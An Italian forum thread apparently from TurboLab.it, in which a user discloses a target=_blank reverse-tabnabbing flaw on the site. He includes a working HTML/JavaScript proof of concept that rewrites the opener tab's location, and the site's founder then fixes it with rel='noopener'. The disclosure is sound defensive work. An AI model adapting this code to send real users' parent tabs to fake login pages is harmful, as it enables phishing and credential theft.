Vulnerabilità target=_blank hijacking

Ti piacciono il sito e la community? Questo è il posto giusto per lasciare commenti, suggerimenti e... critiche.
Regole del forum
Rispondi
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Vulnerabilità target=_blank hijacking

Messaggio da hashcat »

Il forum ed il portale gestiscono i link inclusi nei messaggi aprendoli, in maniera predefinita, in una nuova scheda: questo comportamento espone gli utenti ad una vulnerabilità.
Provando a visionare il link del PoC (in maniera "standard", non forzando "apri in nuova scheda") il sito visitato è in grado di manipolare la scheda padre (TurboLab.it in questo caso) reindirizzandola verso un indirizzo qualsiasi (controllato dal sito esterno). Questo comportamento, seppur non critico, può comportare un certo rischio: in particolare se sfruttato in maniera "intelligente" (ad esempio combinandolo con la tecnica del Tabnabbing per creare una finta pagina di login con cui rubare le credenziali d'accesso a TurboLab.it).

Sorgente PoC:

Codice: Seleziona tutto

<!DOCTYPE html>
<!-- Test based on the information provided here: https://mathiasbynens.github.io/rel-noopener/ -->
<html>

<head>
    <meta charset="utf-8">
    <title>Torna indietro!</title>
</head>

<body>
    <h1>Prova a controllare la scheda sorgente...</h1>
    <script>
        <!--
        if (window.opener) {
            opener.location = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
            var parTrue = document.createElement("p");
            parTrue.innerHTML = "Exploit riuscito!";
            document.body.appendChild(parTrue);
            var imgTrue = document.createElement("img");
            imgTrue.alt = "";
            imgTrue.src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAADPUlEQVR4Ae2ZNZAjVxBA38gkBkO0kZkZlSzvJqbIDIfZ4VyoPFOVdMzMzJcc38UKj31m+9DMi+Nkqqt+zehrvnZUi6+jrd5Rf2z6TDCBMTHaKbCdCtfpwcGhh+tU2EaBdmI0kASfc5h/cTTyL4f5nASh00SJ33ACym+UaCI0cpT5D8dQ/qNEjhD4kJs4itxgOzbdPEaWKFGyPEY3Ntu5gaPITT5kSKTYqvzgrywmT4RqWORZzK/KN1tJUScPcV6ZjU2SICSxlVU7z0OYwwvIgtJHkZTh2hXpQzaNF8zNy0LyBa9SD6/yBbJ5ZkN4CJk9R8hQLxmOIKvAQ8GXT/aeNdzJULiTNchZCLqNWxHzWAwVCxkCW4Pde1l87iQM7kQ2orZfyHFLjl6GsMjIcbxJDi1luXjek38PC/iTP1nAPQBG+lflUpbR0CQ+v4iX7bKQ28FYX5QYoQlTJVko73ntUBxsh7E+Jd6xRBUSEnBtzd2Q82yoB1uCdQJfPhevlcTLd4qB74z1kBTv+jm+HHbVi/FjQDEwYKIXFrvaw/gQk2Qr37AB5CVxi+GhXXy2BQ3ZAohIjGnHQ0F7xWCbYmCbsV69qoXqBmz86VQMdJrpBbv6ACuuqhshPEckdLv/UcHDdVf1GEJ4rlh4zLVyHQ89ripLI8m6VnpAxZLli9JIomLHwzAMYHi3wPwQCmnepcgxvuIfHBz+4SuOUeRdUgjmh7D2NYQIb7GfHk09uJ+3iEA913B7DUdk8QEXcQLIRd7HMndEelf8OGdxDOQMj5u6YglGPks4lb9RQ80KPuclHiBKlAd4ic9ZoYYj/maqQTDShGOLshJmd9OChR8WLexWwnIZq3Y41ickETbgiJziOWrxHKdwRDYQ0ScktVKyBcgJZyYWQbCYiXRUWOCTkn0WNCmdLj9zmzwm5Lkt307XJaX6tPxn9+9bPI0pT0uN9Ys+LdcVJr+4R+Z16uF191j/rC9MdKXZB/zCz3xAvXzAz/zC+0ppVkJLjpvDWJwOQ3k+/A2K4W/RDH+TavjbdMPfqAy/VTvPoFUbarM6Emazevjb9UKO0nA+WAz/k42Q4LNhe7TyPNttC+vZboIJ/gfxxcv8jKizagAAAABJRU5ErkJggg==";
            imgTrue.height = "64";
            imgTrue.width = "64";
            document.body.appendChild(imgTrue);
        } else {
            document.querySelector("h1").innerHTML = "La scheda sorgente non &egrave; stata manipolata.";
            var parFalse = document.createElement("p");
            parFalse.innerHTML = "<code>window.opener</code> ha valore <code>null</code>: exploit <em>NON</em> riuscito!";
            document.body.appendChild(parFalse);
            var imgFalse = document.createElement("img");
            imgFalse.alt = "";
            imgFalse.src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAADbUlEQVR4Ae2ZA4w8ZxTAf6vc8hjUbqPyb9TYqI1rhBfWZszDora7qILabZx0oxrR2bY5eZnJzGTn25vN8feF8+ab9/Fp2EOZPUJczZPkKNDFDEssMUMXBbI8ydWEKCMR7uJzpliyb0zxOXcRwXVOJsEwSw7bMAlOxjVqSDLNkmKbJkENLnALPcZP002OB4hzHtUECVLNecR5gBzdGN/s4RY2RIyM4YNDPM9RvNjh4SjPM2TokyFGiZzFn4bZPEAUJ0R5wLBqf3IWqHOxbkHnaCSmuHaNzOk27WJ19bKQ/M9BSuEg/yObpzaEs3Sz/4IqSqWKL5BVcL4RMd3ev4GfjeDnDeQsON3GjE69h43i0Q0h4+zey+Ljxw38uo24pbjV65WjV4VbVMlx7ClmHZNy8cwnv4I0Y4yRpgJASX5QLmUSezhZbH4jZnKykDlQljeKjzgZWxKyUObzeo3BwF6jLI+JdUxgQ0Qc7gN2d0NaRlkOD4izjmDJXWK1ophpNShoVZZDVKzrXVjyuSZ+HisWDAoWVOTC85r0cywISbB1tGwDOCqBWwgTV4vN9kBZtgC84mOuxsST1ldIyBoUZJXlxqv6pL2CB7DmWoOCa9XkwgP2AyxoojiCe4ZIiGtvFDDRpYnOQ3DPFAvnaVq6MDGjiaopJ9Walhkw4pHlC1JOgqLHxKYPwHoLPHhQx76/bIGzQ3gTgwxyM6Vy81r/m6wOobNrOLD2ZJAApRBgUOvvcXINc2ZDJN7rekrhBvGuHrMhcmaK39WefUMpfKP1fs+ZKRZnhBc0rpQzexmqXCZ9r7RyRk7d8a/as98JokKQP2S3Ld2x04AkLvN4BRVelX5xq4BEJSTLy6eewSnPSJ+8ZUh2p0pQWqcLNZrxUQwfzbqwpM46KFULy/czLp/8hXOwB87hF3l3nP3WYbl6YnItk7riU4rTseJ0UtJ/iQmutU9M1FOzY/SyJG2eH3iYyziRIEFO5DIe5gfmDQWdYzapWaJYctpjk5yeys8sOWw/c6qD5FQ5PfdST3dR5d3U41VMzxUKFGHu4U9b5X9yD2H1AoV6ieYCHuFT/mZs7Z0x/uZTHuEChRLNZhapNr9Mt/mFyvKXah9UL9W6U6z2ulms3vxyvVBDYjN/WGz+Lxshwp2b9dPK/Nsu69Zvuz32WAYW5+NHGJKxLAAAAABJRU5ErkJggg==";
            imgFalse.height = "64";
            imgFalse.width = "64";
            document.body.appendChild(imgFalse);
        }
        //-->
    </script>
    <noscript>
        <p>Risultato ignoto: il browser in uso non ha eseguito lo script JavaScript!</p>
        <img alt="" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAABSElEQVRo3u1ZwZHDIAykBbdAC26Bma2AFtyCWqAFt0ALtOAW3AItcI9kcnmIM8mASOa0+nq8ayHBChujUCi+DVjgQYhIyCj3yEjYQbBjqVcEHA9SPg5sY756u6T+jROuLzk9Jbs1qJ+A/WXyW+y9BNg3BZRu1fB2DjKW2TmgUTnIiCBscHBwIMRaP/SvgxMBK/sE36a2Zw4S/J/tyjWr65eDy1chDBTQJJL+vYA4sAibzspxbdh0ZHFtGObSSy0AVpyDj+SXa7+gIMmkPlat2TIv9QVRhr5m1IJM4eWKCfEya39WVt7OrPwgt+/lgRa0gd5PpWcXIBlJMJsPyQpIU22HClAoPue2zMLBcYOqBPn2dBxnkID/uRhCD0n6daIFrw7hokNY4q2oCph7DVEQJQdxzpJ62UbMUy2ZMbCPPwcZUe2IQvHl+AGBQwAomqDWfwAAAABJRU5ErkJggg==" height="64" width="64"/>
    </noscript>
</body>

</html>
Link PoC: URL

Maggiori informazioni: QUI

:ciao

:arrow: Remember the milk
“The quieter you become, the more you can hear”
System
System
Bot ufficiale TurboLab.it
Bot
Messaggi:
Iscritto il: sab dic 31, 2016 6:19 pm
Contatta: Contatta

Re: Vulnerabilità target=_blank hijacking

Messaggio da System » ven giu 10, 2016 12:51 pm


Avatar utente
Zane
Fondatore
Fondatore
Messaggi: 5465
Iscritto il: mer mag 01, 2013 11:20 am
Contatta:

Re: Vulnerabilità target=_blank hijacking

Messaggio da Zane »

Cazzius! Ho usato window.opener molte volte, ma non avrei mai pensato che funzionasse anche cross-origin!

Grazie per la segnalazione, correggo al più presto.
Zane - TurboLab.it
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: Vulnerabilità target=_blank hijacking

Messaggio da hashcat »

Zane ha scritto:Cazzius! Ho usato window.opener molte volte, ma non avrei mai pensato che funzionasse anche cross-origin!

Grazie per la segnalazione, correggo al più presto.
Neanch'io ne ero al corrente fino a poco tempo fa.
Di nulla, mi spiace per l'ora.

:fiu
“The quieter you become, the more you can hear”
Avatar utente
Zane
Fondatore
Fondatore
Messaggi: 5465
Iscritto il: mer mag 01, 2013 11:20 am
Contatta:

Re: Vulnerabilità target=_blank hijacking

Messaggio da Zane »

Ho ripreso questa segnalazione contestualmente alla migrazione del server. Ho ampliato la nostra estensione per fare in modo che aggiunga rel="noopener" a tutti i link esterni. In questa situazione, il PoC sembra fallire, quindi direi che ora siamo al sicuro da questo problema.
Zane - TurboLab.it
Avatar utente
Zane
Fondatore
Fondatore
Messaggi: 5465
Iscritto il: mer mag 01, 2013 11:20 am
Contatta:

Re: Vulnerabilità target=_blank hijacking

Messaggio da Zane »

Novità interessante circa questo enorme problema di sicurezza: a partire da Chrome 88, noopener è implicito in tutti i link che si aprono in _blank :clap
Zane - TurboLab.it
System
System
Bot ufficiale TurboLab.it
Bot
Messaggi:
Iscritto il: sab dic 31, 2016 6:19 pm
Contatta: Contatta

Re: Re: Vulnerabilità target=_blank hijacking

Messaggio da System » mer gen 20, 2021 12:10 am


Rispondi